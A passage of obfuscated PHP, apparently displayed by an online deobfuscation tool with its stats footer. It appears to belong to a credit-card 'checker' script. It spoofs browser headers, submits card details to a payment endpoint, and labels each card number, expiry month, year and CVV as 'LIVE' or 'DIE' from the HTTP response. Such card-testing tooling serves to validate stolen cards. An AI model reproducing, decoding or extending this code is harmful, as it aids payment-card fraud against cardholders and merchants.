"\163\x65\x63\55\x66\145\164\143\150\x2d\144\x65\x73\164\x3a\40\145\x6d\160\x74\x79", "\x73\x65\143\x2d\x66\x65\x74\x63\150\55\x6d\x6f\144\145\x3a\x20\x63\x6f\x72\163", "\163\145\x63\55\146\145\x74\x63\x68\55\163\151\x74\145\x3a\40\163\141\x6d\x65\55\157\x72\x69\x67\x69\x6e", "\165\163\x65\162\x2d\x61\147\145\x6e\164\x3a\x20\x4d\x6f\172\151\x6c\x6c\141\57\65\56\x30\40\x28\x57\x69\x6e\x64\157\x77\x73\x20\x4e\x54\40\61\x30\56\x30\x3b\x20\x57\151\x6e\66\64\73\40\170\66\x34\51\x20\x41\160\x70\x6c\145\x57\x65\x62\113\151\x74\x2f\65\x33\x37\x2e\63\x36\x20\50\113\110\124\115\114\54\x20\154\x69\153\145\x20\x47\x65\143\x6b\x6f\x29\x20\x43\x68\x72\157\x6d\x65\x2f\x31\x32\62\x2e\60\x2e\60\x2e\60\x20\x53\x61\x66\x61\x72\x69\x2f\x35\x33\x37\x2e\63\66"))); $response_payment = curl_exec($curl_payment); $info_payment = curl_getinfo($curl_payment); $err_payment = curl_error($curl_payment); $elapsed_time = time() - $time; $info_payment = curl_getinfo($curl_payment); $httpCode_payment = $info_payment["\x68\x74\164\160\137\x63\x6f\x64\145"]; $retornomensagem = trazer($response_payment, "\x6d\145\163\163\x61\147\x65\x22\72\42", "\x22"); $response_decoded = json_decode($response_payment, true); if ($httpCode_payment == 200) { echo "\74\163\x70\141\x6e\x20\x63\x6c\141\x73\x73\x3d\x27\x62\x61\144\x67\x65\x20\x62\141\144\x67\x65\55\x73\x75\143\143\145\163\163\47\x20\163\164\171\154\145\75\x27\143\x6f\154\157\x72\72\x77\150\151\x74\145\47\x3e\x4c\111\x56\x45\x3a\x3c\57\163\x70\141\x6e\76\x20\342\236\224\40\x3c\57\163\160\141\x6e\x3e\74\x73\x70\x61\156\x20\x63\x6c\x61\x73\x73\75\x27\142\141\x64\x67\145\x20\142\141\x64\x67\x65\x2d\x69\x6e\146\x6f\x27\40\163\164\x79\154\x65\x3d\47\143\x6f\x6c\x6f\162\72\167\150\151\x74\145\x27\x3e\x20" . $cc . "\174" . $mes . "\x7c" . $ano . "\x7c" . $cvv . "\x20\74\57\x73\x70\x61\156\76\x20\74\163\160\141\x6e\x20\143\x6c\x61\x73\x73\x3d\x27\x62\141\144\147\x65\40\142\x61\x64\147\145\x2d\x69\x6e\x66\157\x27\x20\163\164\x79\x6c\145\75\47\x63\157\154\x6f\x72\x3a\x77\150\151\164\145\x27\x3e\74\57\x73\160\x61\x6e\76\x3c\x2f\150\x35\76\x3c\142\x72\76"; } else { echo "\74\163\160\141\x6e\40\x63\154\141\163\163\x3d\47\142\x61\x64\x67\145\40\142\141\x64\x67\x65\55\x64\141\x6e\147\x65\x72\x27\40\163\x74\x79\154\145\75\47\x63\157\154\x6f\x72\x3a\x77\150\151\164\x65\x27\x3e\104\111\105\x3c\x2f\163\160\x61\x6e\x3e\x20\xe2\236\x94\40\x3c\57\x73\x70\x61\156\x3e\74\163\160\141\x6e\40\x63\x6c\x61\x73\163\x3d\47\x62\141\x64\x67\145\x20\x62\x61\x64\x67\x65\x2d\144\x61\156\x67\x65\162\47\40\x73\x74\171\x6c\x65\x3d\x27\x63\x6f\x6c\x6f\162\x3a\167\x68\151\164\145\47\76\x20\x20" . $cc . "\174" . $mes . "\x7c" . $ano . "\x7c" . $cvv . "\40\74\57\163\x70\141\x6e\76\40\x3c\x73\160\x61\156\40\143\x6c\141\163\x73\x3d\47\142\141\144\147\x65\40\x62\141\144\147\145\x2d\144\x61\x6e\147\x65\x72\47\x20\x73\x74\x79\154\145\75\x27\x63\157\154\157\x72\72\x77\150\x69\164\x65\x27\76\x3c\57\163\160\141\156\x3e\x3c\x2f\x68\65\76\74\x62\x72\76"; } } } goto i8qSy; i8qSy: 

Function Calls

None

Variables

None

Stats

MD5 f8818f73d34e39803c3f586dbed1b3a4
Eval Count 0
Decode Time 50 ms